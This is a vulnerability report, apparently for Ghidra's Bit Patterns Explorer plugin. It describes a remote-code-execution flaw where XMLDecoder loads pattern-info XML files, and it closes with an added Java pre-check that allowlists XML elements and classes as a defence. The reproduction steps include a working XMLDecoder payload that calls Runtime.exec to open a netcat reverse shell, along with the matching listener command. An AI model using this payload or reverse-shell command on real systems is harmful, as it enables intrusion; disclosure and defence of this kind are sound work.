Description:
XMLDecoder is used in FileBitPatternInfoReader.java which causes a Remote Code Execution in the Bit Patterns Explorer Plugin.
Steps to reproduce the behavior:
1. Open a binary with CodeBrowser
2. Go to Window->Script Manager and select the "DumpFunctionPatternInfoScript"
3. Export the resulting XML file.
4. Add the following at the end of the file, after the closing tag of the last object and before the </java> closing tag:
<object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 1337 -c ’/bin/bash’</string> </void> </object>
- Open a local listening server with:
nc -lvnp 1337
- Go to Window->Function Bit Patterns Explorer (you will need to enable experimental mode from configuration first File->Configure...)
- In the opened plugin window, click "Read XML Files", point to the directory where the XML file was saved and click OK.
- Go back to the listener and see the shell opened.
Expected behavior
No code from the xml files should be executed while running this plugin.
Environment:
- OS: Kali Linux x86_64
- Java Version: 11.0.4
- Ghidra Version: 9.0.4
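
A defender-side check for the behavior reported above, added here as an example (it is not part of the original report and not Ghidra's own code): before a file is handed to XMLDecoder, parse it with a DTD-disabled DOM parser and reject any element, class or method outside an allowlist. The class name com.example.PatternInfo and the three allowlists are assumptions standing in for whatever the plugin really serializes.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Set;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Element;
import org.w3c.dom.Node;

public class XmlDecoderPrecheck {
    // Hypothetical allowlists: replace with the bean classes the plugin actually writes.
    static final Set<String> CLASSES = Set.of("java.beans.XMLDecoder", "java.util.ArrayList",
            "com.example.PatternInfo"); // placeholder class name
    static final Set<String> METHODS = Set.of("add"); // collection population only
    static final Set<String> ELEMENTS = Set.of("java", "object", "void", "string", "int",
            "long", "boolean", "null");

    /** Returns null if the document is acceptable, otherwise the reason it was rejected. */
    static String firstViolation(InputStream in) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Refuse DOCTYPE declarations so the pre-check itself cannot be abused for XXE.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return check(f.newDocumentBuilder().parse(in).getDocumentElement());
    }

    // Depth-first walk: every element must pass, not just the top-level objects.
    private static String check(Element e) {
        String tag = e.getTagName();
        if (!ELEMENTS.contains(tag)) return "element <" + tag + "> not allowed";
        if (e.hasAttribute("class") && !CLASSES.contains(e.getAttribute("class")))
            return "class " + e.getAttribute("class") + " not allowed";
        if (e.hasAttribute("method") && !METHODS.contains(e.getAttribute("method")))
            return "method " + e.getAttribute("method") + " not allowed";
        if (e.hasAttribute("field")) return "static field access not allowed";
        for (Node n = e.getFirstChild(); n != null; n = n.getNextSibling()) {
            if (!(n instanceof Element)) continue;
            String v = check((Element) n);
            if (v != null) return v;
        }
        return null;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: one benign bean, then an object whose class is off the allowlist.
        String xml = "<java version=\"11.0.4\" class=\"java.beans.XMLDecoder\">"
                + "<object class=\"com.example.PatternInfo\"><void property=\"name\">"
                + "<string>f</string></void></object>"
                + "<object class=\"java.lang.Runtime\" method=\"getRuntime\"/></java>";
        byte[] bytes = xml.getBytes(StandardCharsets.UTF_8);
        System.out.println(firstViolation(new ByteArrayInputStream(bytes)));
    }
}
```

Pre-filtering narrows what XMLDecoder will instantiate, but reading the files with a plain XML parser that never invokes methods removes the deserialization step entirely.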